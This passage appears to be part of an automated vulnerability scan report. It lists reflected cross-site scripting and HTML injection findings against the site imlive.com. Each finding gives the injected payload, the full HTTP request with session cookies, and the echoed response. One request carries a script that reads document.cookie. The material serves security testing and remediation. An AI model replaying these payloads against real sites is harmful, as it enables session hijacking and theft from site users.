Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:11 GMT
Connection: close
Content-Length: 14486
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/warningms.asp?ms5576b'><a>7cdefc4b49a&lr=1107816008&ud=0&pe=warningms.asp&qs=ms5576b'>
...[SNIP]...

4.564. http://imlive.com/warningms.asp [ms parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /warningms.asp

Issue detail

The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a366"><a>e4ecb16fbac was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?ms9a366"><a>e4ecb16fbac HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:00 GMT
Connection: close
Content-Length: 14486
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<A HREF="/liveexperts.asp?ms9a366"><a>e4ecb16fbac">
...[SNIP]...

4.565. http://imlive.com/warningms.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /warningms.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d01b7'><a>ee151ed1363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?d01b7'><a>ee151ed1363=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:56 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:57 GMT
Connection: close
Content-Length: 14469
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/warningms.asp?d01b7'><a>ee151ed1363=1&lr=1107816008&ud=0&pe=warningms.asp&qs=d01b7'>
...[SNIP]...

4.566. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-advanced-search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5982a'-alert(1)-'59971b4cff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 75081
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ad
...[SNIP]...

4.567. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-advanced-search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af1e"><a>4c3fec81c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-advanced-search/?9af1e"><a>4c3fec81c51=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:53 GMT
Connection: close
Content-Length: 74955
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-advanced-search/?9af1e"><a>4c3fec81c51=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.568. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-faq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57b4'-alert(1)-'0e1cfcefff7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:52 GMT
Connection: close
Content-Length: 44471
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/faq_m1.aspx&he=imlive.com&ul=/webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

4.569. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-faq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5762"><a>e3b37a89d43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-faq/?a5762"><a>e3b37a89d43=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:51 GMT
Connection: close
Content-Length: 44322
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-faq/?a5762"><a>e3b37a89d43=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.570. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a901'-alert(1)-'19762fb72eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-login/?6a901'-alert(1)-'19762fb72eb=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:17:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 22258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/login.aspx&he=imlive.com&ul=/webcam-login/?6a901'-alert(1)-'19762fb72eb=1&rf=http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f&qs=6a901'-alert(1)-'19762fb72eb=1&qs=6a901'-alert(1)-'19762fb72eb=1&bd=2257131737&sr=1
...[SNIP]...

4.571. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2bef"><a>297c1fbe51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-login/?f2bef"><a>297c1fbe51b=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
